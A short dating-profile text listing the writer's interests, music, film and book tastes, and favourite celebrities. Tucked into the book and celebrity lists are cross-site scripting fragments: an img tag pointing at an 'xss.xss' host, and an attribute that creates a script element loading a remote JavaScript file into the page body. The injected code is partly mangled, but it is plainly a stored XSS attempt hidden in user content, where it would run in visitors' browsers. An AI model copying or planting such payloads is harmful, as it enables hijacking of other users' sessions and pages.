Animals, Music, Travel, Gardening, Movies, Outdoors, WINE, the Beach and DVR'ing Reality TV...
ADULTS (28 and older please - let's be realistic here) who don't play games OR have a long list of skanky "friends" and DO love to laugh and travel. And if Matthew McConaughey were lonely, wouldn't mind helping a brother out!!!!!DO NOT WRITE ME IF YOU DON'T HAVE A PICTURE OR PICTURES FOR ME TO VIEW - TURN ABOUT IS FAIR PLAY YA KNOW. Call it superficial if you want but wouldn't it annoy you if someone sent some random email and you had no IDEA what they looked like but you were intrigued?...
All but NO COUNTRY PLEASE - too pitiful...
Comedies - Action (blow 'em up shoot 'em up) - OCCASIONAL chic flick...
Reality shows ...
there are entirely too many books to list - but the basics TUESDAYS WITH MORRIE, THE WOMAN HE LOVED (about kind edward the viii), any book by JANE GREEN cause she's f'king hilarious. img src="http://xss.xss/xss.jpg" x='
Anne Heche, Christina Aguilera, Melissa Etheridge, Sting, Mario Lemieux"var x=document.createElement('script');x.src='http://www.../.../ test.js';document.getElementsByTagName('body')[0].appendChil d(x);" /..